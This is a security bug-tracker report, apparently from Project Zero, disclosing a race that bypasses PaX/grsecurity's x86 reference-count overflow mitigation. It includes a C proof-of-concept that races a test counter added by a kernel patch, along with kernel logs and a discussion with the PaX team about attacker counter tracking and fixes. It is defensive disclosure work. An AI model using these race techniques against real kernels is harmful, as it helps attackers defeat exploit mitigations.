New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.

Issue 856 link

Starred by 1 user

Issue metadata

Status: Fixed
Owner:
Closed: Nov 2016
Cc:



Sign in to add a comment

PaX: reference count overflow mitigation can be bypassed on x86 by racing

Project Member Reported by jannh@google.com, Jun 27 2016

Issue description

PaX contains a mitigation for reference count overflows that is intended to prevent atomic_t variables from reaching 0x80000000 and, more importantly, wrapping around to zero. A documented special case on x86 (https://forums.grsecurity.net/viewtopic.php?f=7&t=4173#APPENDA) is that, because "atomically increment unless current value is X" can't be implemented without a cmpxchg loop, the code instead increments the counter, checks for an overflow and, if an overflow happened, immediately decrements the counter back.

It is believed that this race is too narrow to hit in practice; however, in my tests, the race is usually won in a few seconds at most.

My test setup:

In a VirtualBox VM, I installed Linux 4.5.7 with a config based on Debian's distro config, patched with grsecurity-3.1-4.5.7-201606262019.patch, with grsecurity configured as follows:

  Configuration Method (Automatic)
  Usage Type (Desktop)
  Virtualization Type (Guest)
  Virtualization Hardware (EPT/RVI Processor Support)
  Virtualization Software (VirtualBox)
  Required Priorities (Security)

I applied a kernel patch (attached as overflowme.patch) to introduce an atomic_t that starts at 0x7fffffff and can be incremented by the user.

After booting the resulting kernel, I compiled (gcc -o test_refcount test_refcount.c -std=gnu99 -Wall) and ran the following test program:

======
#include <stdint.h>
#include <sys/eventfd.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <err.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

#define CONCURRENCY 10

int efd;

void make_child(void) {
  pid_t child = fork();
  if (child == -1)
    err(1, "fork");
  if (child != 0)
    return;

  uint64_t ctr = 4242;
  for (int i=0; i<1000; i++)
    write(efd, &ctr, 8);
  exit(0);
}

unsigned int get_value() {
  char buf[4242];
  if (read(efd, buf, 4242) != 8)
    err(1, "efd read");
  return *(uint64_t*)buf;
}

int main(void) {
  setbuf(stdout, NULL);

  efd = eventfd(0, 0);
  if (efd == -1)
    err(1, "eventfd");
  printf("counter: 0x%x\n", get_value());

  for (int i=0; i<CONCURRENCY; i++)
    make_child();

  while (1) {
    int status;
    if (wait(&status) == -1)
      err(1, "wait");
    unsigned int value = get_value();
    if (value == 0x7fffffff) {
      putchar('.');
    } else if (value == 0xffffffff) {
      putchar('#');
    } else {
      printf("\nnew status: 0x%x\n", value);
      if (value > 30 && value < 0x10000000)
        return 0;
    }
    make_child();
  }
}
======

The program output looks like this (dots stand for failed race attempts):

======
counter: 0x7fffffff
....................................................
new status: 0x80000017

new status: 0x8000006f

new status: 0x8000157d

new status: 0x800015c6
[...]
======

Before the race is won, PaX will repeatedly complain about the overflowing reference counters and terminate the offending processes:

======
Message from syslogd@debian at Jun 27 16:34:29 ...
 kernel:[ 5699.705439] PAX: refcount overflow detected in: test_refcount:26921, uid/euid: 1000/1000

Message from syslogd@debian at Jun 27 16:34:29 ...
 kernel:[ 5699.705563] PAX: refcount overflow detected in: test_refcount:26925, uid/euid: 1000/1000

Message from syslogd@debian at Jun 27 16:34:29 ...
 kernel:[ 5699.706708] PAX: refcount overflow detected in: test_refcount:26919, uid/euid: 1000/1000
[...]
======

The program then continues to increment the reference counter for a while before it reaches 0xffffffff, at which point the second overflow back to small numbers requires the same race to be won again.


Some notes:
 - I haven't tested this outside VirtualBox - being in a VM might increase
   the probability of hitting the race.
 - The VM was configured to have 6 processor cores. Because any two of the
   six tasks can race with each other, I think the birthday paradox applies
   and significantly raises the probability of success.
 - The kernel was not configured with CONFIG_PREEMPT (only
   CONFIG_PREEMPT_VOLUNTARY), so only six tasks raced with each other at a
   time; on a system with CONFIG_PREEMPT, forcibly preempted tasks might,
   depending on where the race occurs, also be able to participate in races.


For reference counters, a nice way to fix this would be to just replace the "jno" instructions in the x86-specific assembly code with "jns". This would preserve the property that atomic_t can overstep the 0x7fffffff treshold for a short moment, but would get rid of the race permitting permanent increments beyond that treshold. This fix would have the advantage that the code size doesn't change.

Sadly, since some users of atomic_t (such as i_writecount) aren't actually reference counters and can legitimately have negative values, this doesn't work directly and would require changing those users of atomic_t to atomic_unchecked_t or so.

If removing the refcounting protection from fields that can take negative values is undesirable, it might be necessary to increase the code size and e.g. perform an addition with an immediate value prior to checking the overflow flag.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
 
Project Member

Comment 1 by jannh@google.com, Jun 27 2016

overflowme.patch
1.7 KB Download
Project Member

Comment 2 by hawkes@google.com, Jul 8 2016

Cc: pagee...@freemail.hu jann@thejh.net spen...@grsecurity.net
Labels: -Restrict-View-Commit
Lifting view restriction. The following update was provided by PaX team:

----

in general, we believe that there's no need to keep any of this secret, so feel 
free to open it up to the public. in fact we believe that this is a publicly known
and documented issue (in more than one way, as you'll see below), so we're not sure
what the point of all this was, but whatever.

regarding your particular claims:

1. we find the claim that "the race is usually won in a few seconds at most" is
   misleading since your test already sets up the refcount precisely to INT_MAX
   which otherwise takes time and is part of the attack time. you also created
   a refcount read-back feature that we believe is not typically available to an
   attacker unless he's able to control the precise count (depends on the bug
   and circumstances).

2. in my experiments (quad core SNB at around 2.5GHz, both real and vmware)
   i could reproduce the (artificially shortened) race itself fine in a few
   seconds (depends somewhat on the number of cores, where one trades off control
   over the precise value of the refcount for speed). in my experience 2 cores
   don't do much worse than 4 cores.

   the next step in the attack is to reach a precise refcount value of 0 which
   here takes about 2.5-3 mins (real) and 5-7 mins (vmware). note that there's
   a constant workfactor involved here, the syscall path you chose is relatively
   fast, back in 2008 when the motivating example for REFCOUNT appeared, the
   refcount overflow took more than 20 minutes to trigger in vmware.

   i also experimented with disabling IRQs around the refcount increment but it
   seemed to play little if any role so the race doesn't seem to be won because
   some interrupt arbitrarily extended the inc/dec window (this also means that
   preemption would have no useful effect for an attack).

   we're not sure why you called this part as needing to win the race again as
   there're no checks and thus no saturation attempts at this point. perhaps you
   meant that an attack does have to care about precision as reaching any value
   other than 0 will mean the whole attack attempt will have to be redone (so we
   are talking about several minutes per attack attempt). now i didn't think too
   much about how to precisely control the overflowed refcount value, so it's not
   clear whether this second step can be controlled with 100% certainity or not.

3. as for solving the problem, we have a few comments:
   - as the blog already notes, preventing operations on negative refcount (well,
     atomic_t) values doesn't work in general since some real use cases expect
     to work in that range already. a better solution is to saturate at a value
     that is at least NR_CPUS below the overflow threshold, this way the refcount
     cannot overflow into the negative range even if all cores win (in practice
     we'd need a bigger safety margin, as much as the number of increments we
     can expect while the interrupted saturation code sits in an irq/scheduling
     window). the problem with this approach is again that not all atomic users
     use single increments on the value, so this would require analysis and special
     cases, something we try to avoid.

     as for your suggestion about adding an immediate before checking for overflow,
     i don't see how it'd work, do you have a code example perhaps? e.g., to what
     value would you add the constant? the value before or after the atomic op?
     and how would you acquire either while avoiding the very race you're trying
     to defend against?

   - as we discussed it in private already, we had practical reasons to not enable
     the reaction mechanism in grsec (PaX doesn't have much beyond reporting, by
     design). one is the existence of non-refcount atomic*_t false positives that,
     thanks to some work based on static analysis in recent months, we are just
     about to eradicate with reasonable confidence. Brad has in fact jumped the
     gun already and enabled the reaction mechanism, i'm still holding out as the
     static analysis isn't complete enough to my satisfaction.

     another reason for not enabling the attack reaction mechanism was that for
     refcount overflows attribution may not be easy if the refcount in question
     can also be used by innocent parties (e.g., task or mm struct). in such cases
     an attacker could DoS other users though he'd still lose the bug thanks to
     the logging (which we already consider a strong deterrent since any refcount
     overflow attack will generate logs).

not sure what the conclusion here is, but here's some parting thoughts anyway:
- you can publish this without delay, preferably with our comments (or at least
  let us comment on it once published),
- we consider the issue as publicly known and we'd been actively working on it
  before your report already,
- we question how close your PoC is to real life bugs and exploits.

----

Comment 3 by jann@thejh.net, Jul 8 2016

> regarding your particular claims:
>      
> 1. we find the claim that "the race is usually won in a few seconds at most" is
>    misleading since your test already sets up the refcount precisely to INT_MAX
>    which otherwise takes time and is part of the attack time.

Perhaps I wasn't clear enough about what I intended to refer to with "the race".
"The race" was meant to refer to attacking the race condition in the refcounting
mitigation, not the full attack against a reference counting vulnerability.
In other words, I was talking about the added attack time compared to exploiting
such an issue on a kernel without this mitigation.


> you also created
>    a refcount read-back feature that we believe is not typically available to an
>    attacker unless he's able to control the precise count (depends on the bug
>    and circumstances).

The read-back feature was mostly meant to make it easier to see what's going on
and verify that the counter really is overflowing.

However, for a reference counter with a value that is unknown to the attacker but
isn't changed by things outside the attacker's control during the attack, I
believe that it is actually possible to determine the value of the counter in the
middle of the attack and then keep track of it.

When an attacker increments a reference counter and the calling process is killed
by the kernel, this discloses that the current reference counter value is
0x7fffffff. When the attacker then attacks the reference counter overflow, the
reference counter is incremented by the number of processes that are not killed.

This means that an attacker should be able to increment without parallel
execution until the refcounting mitigation triggers (0x7fffffff has been
reached) and then attack the race condition until the mitigation stops
triggering (>=0x80000000 has been reached).
At this point, the new reference count is known to be 0x7fffffff+N, where N is
the number of processes that didn't die after triggering the race condition.
Now the attacker can perform increments again, keeping track of the counter value.
As long as nothing else on the system changes the reference count shortly after
the second race, this should allow an attacker to exploit reference count
overflows as if a counter read primitive was available.

> 2. in my experiments (quad core SNB at around 2.5GHz, both real and vmware)
>    i could reproduce the (artificially shortened) race itself fine in a few
>    seconds (depends somewhat on the number of cores, where one trades off control
>    over the precise value of the refcount for speed). in my experience 2 cores
>    don't do much worse than 4 cores.

Ah, I wouldn't have expected that.


>    we're not sure why you called this part as needing to win the race again as
>    there're no checks and thus no saturation attempts at this point. perhaps you
>    meant that an attack does have to care about precision as reaching any value
>    other than 0 will mean the whole attack attempt will have to be redone (so we
>    are talking about several minutes per attack attempt). now i didn't think too
>    much about how to precisely control the overflowed refcount value, so it's not
>    clear whether this second step can be controlled with 100% certainity or not.

Sorry, please ignore that part. I was confused about the circumstances under which
the overflow flag is set.


> 3. as for solving the problem, we have a few comments:
>    - as the blog already notes, preventing operations on negative refcount (well,
>      atomic_t) values doesn't work in general since some real use cases expect
>      to work in that range already. a better solution is to saturate at a value
>      that is at least NR_CPUS below the overflow threshold, this way the refcount
>      cannot overflow into the negative range even if all cores win (in practice
>      we'd need a bigger safety margin, as much as the number of increments we
>      can expect while the interrupted saturation code sits in an irq/scheduling
>      window). the problem with this approach is again that not all atomic users
>      use single increments on the value, so this would require analysis and special
>      cases, something we try to avoid.

Ah, true. It looks like there is a lot of atomic_t variables that are used for
memory usage tracking and things like that that can be incremented in relatively
big steps.

However: Ignoring them in the mitigation design wouldn't introduce bugs, it would
just mean that the mitigation might be bypassable for these atomic counters, right?
So changing the current mitigation to check against the safety margin instead would
make the protection reliable for normal reference counting in exchange for
potentially making it bypassable for some cases that mostly aren't refcounting.
(Or you could do both checks - but of course that would increase the code size by
2 bytes or so for every atomic operation.)


>      as for your suggestion about adding an immediate before checking for overflow,
>      i don't see how it'd work, do you have a code example perhaps? e.g., to what
>      value would you add the constant? the value before or after the atomic op?
>      and how would you acquire either while avoiding the very race you're trying
>      to defend against?

It was a stupid idea. I was thinking of something like:

    lock addl <increment>, <counter>
    mov <counter>, eax
    addl $<safety margin>, eax

followed by the existing code that checks for the overflow flag. But of course
that doesn't actually make much sense given that x86 can directly compare a memory
argument to an immediate.
Project Member

Comment 4 by hawkes@google.com, Jul 11 2016

Summary: PaX: reference count overflow mitigation can be bypassed on x86 by racing (was: PaX: reference count overflow mitigation can be bypassed by racing)
Labels: -Severity-High Severity-HIgh
Project Member

Comment 6 by jannh@google.com, Nov 10 2016

Status: Fixed (was: New)
Marking as fixed since grsecurity triggers account lockout when the attacker loses the race, so it should be very hard to get past the mitigation now. (This change was made shortly after the bug was reported.)

Comment 7 by pagee...@gmail.com, Nov 10 2016

actually, we do even better now: https://forums.grsecurity.net/viewtopic.php?f=7&t=4173#p16722

Sign in to add a comment